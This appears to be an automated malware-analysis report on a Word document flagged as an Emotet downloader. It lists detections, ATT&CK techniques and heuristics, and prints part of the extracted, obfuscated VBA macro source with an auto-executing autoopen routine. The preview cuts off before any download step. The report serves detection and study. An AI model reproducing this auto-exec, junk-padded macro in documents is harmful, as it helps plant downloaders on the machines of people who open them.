MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing VBA macros, specifically an AutoOpen macro. The ClamAV detection and heuristic firings strongly indicate this is an Emotet downloader. The VBA code, though obfuscated, likely executes a second-stage payload, a common Emotet behavior.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6954531-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6954531-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 22822 bytes |
SHA-256: 7fde3b87aa6f19e205feb7d2cfa9900da465bb29f47ead155e7aa5439acbac8c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "GUAxZo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "rCQAkUA"
Attribute VB_Base = "0{0A5FB00E-D718-41CC-9F16-C8FEF46C3ACD}{61BC3D54-1463-4DFA-B77B-B2799E590BA5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "EABZoB"
Attribute VB_Base = "0{11FC309E-2A75-4B67-9F01-3E8C9F3E2515}{A7E125F1-6AFA-4095-8EDC-90FEA386D702}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "wDZUDUG"
Sub autoopen()
If CB_CCB = FC4wxA Then
ElseIf BQwAACoU = dUkGDZx Then
soAQAc = Atn(819075654)
ElseIf IwQAAUD4 = vDcQUZA4 Then
skw_4Ac = Int(963430733)
ElseIf wZAAQx = mUA_wDG Then
End If
If ZAoGDk = B_ABQcXQ Then
ElseIf B_AAQA = iDoAAAD Then
nxAAAxo1 = Atn(828064624)
ElseIf pDQAA1 = WAZkcB_ Then
tUwQCxAZ = Int(882581804)
ElseIf XAAUAQAB = zACAkA Then
End If
ZA1A1o
If iADGAQAo = YAB_1Z Then
ElseIf dQoAxAAA = qAADACAZ Then
IA1_QCX = Atn(56278449)
ElseIf iBCCQUxB = UBACAA Then
I4BAxD = Int(814365295)
ElseIf VxAkwk = NUw4_CA Then
End If
If HoA1Awoc = j4wAXXD Then
ElseIf wAA4U4 = mX1xAGAZ Then
jQXBkkBA = Atn(658159943)
ElseIf jDAUU4 = OUGUQkAQ Then
w1AZwUcC = Int(370010936)
ElseIf oACABk = fkDUQU Then
End If
If k1QBAAcB = QAG1A_wD Then
ElseIf UAcACU = aQUZGG Then
FQZAoGB = Atn(82985107)
ElseIf NCcAwB = PAADoA Then
RkAABxkx = Int(371206787)
ElseIf H1AooQok = NBQ1AD Then
End If
End Sub
Attribute VB_Name = "iZDUADAo"
Function ZA1A1o()
On Error Resume Next
If jUcwc_X = i1A4QAU Then
ElseIf ZcXAkA = FcBAc_BZ Then
IcAcCADU = Atn(949354556)
ElseIf wAQcQ4U = NAxcDwA Then
pBDG4AAA = Int(494392853)
ElseIf IAkC_Xw = KoA1AAw Then
End If
If WAAAXXAA = Z_QwAA_Z Then
ElseIf Z1oQA1XC = M4BAA4 Then
rQcDokA = Atn(947336719)
ElseIf JAUAQAA = lUAxADcA Then
vAUDcAD = Int(789772380)
ElseIf nUG4GQw = DG11ADQA Then
End If
If uc4BADoB = BkXQDA1 Then
ElseIf CDDBkA = bAUAZGD Then
SQADAAA = Atn(74170508)
ElseIf qA_ADCA = qAZABAD Then
CZ_DA4UQ = Int(882683139)
ElseIf WDZDcAA = jZ_UUUAB Then
End If
If 6831 < 10238 Then
IUxAxDZX = vbFalse
If HDAA_xA = P4AZXA_ Then
ElseIf EZADQ14 = PCBwoA Then
hCBAkC = Atn(510635420)
ElseIf jkAQxA = sQ4ABQ Then
rAcxDA = Int(876982222)
ElseIf zQBDcB = RAZ4A1 Then
End If
If MAADAXZG = GAkwUA Then
ElseIf TAAACXA = RGUkAcA1 Then
AGQABAC = Atn(479776790)
ElseIf QCDAkAow = zU4XAcA Then
OBAUA4 = Int(794516148)
ElseIf oxcUB4G = NcoDAkZ Then
End If
End If
If dAkA4UB = hAABAwkc Then
ElseIf HAADAABU = bUkwDA Then
jUCAA4w = Atn(679450840)
ElseIf IcA1A1 = qXCxAxB Then
vAZwc4 = Int(518584356)
ElseIf ukQABZc = AGwBBAQ Then
End If
If fZD_ACA = L1AXA_A Then
ElseIf oAADDwZG = KA4cUXUA Then
R4DAQAA1 = Atn(121404134)
ElseIf EZ_DAAAU = nAc4k41B Then
BZUBAAD = Int(585375453)
ElseIf KQGUDCA4 = IxABB1k_ Then
End If
If EAAoACZ = RAUUxU1Q Then
ElseIf wDA1BAA = nAwUAZDZ Then
pQxAUDw = Atn(750990392)
ElseIf mQBk1xD = iDBBBw Then
bAwGA1 = Int(233546605)
ElseIf wAQX4AcB = CDA4AAA_ Then
End If
S4AA1QUA = EABZoB.bXZoUABG + EABZoB.CAAAAAAB
If UBXooo = KAA1AA Then
ElseIf ukDQQ_C = dDkUDZA_ Then
V4_AAUD = Atn(505078683)
ElseIf jABAoAA = mC4_oAAC Then
nAAZXwBA = Int(971430846)
ElseIf HCAA1A = bA_DUUQ Then
End I
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.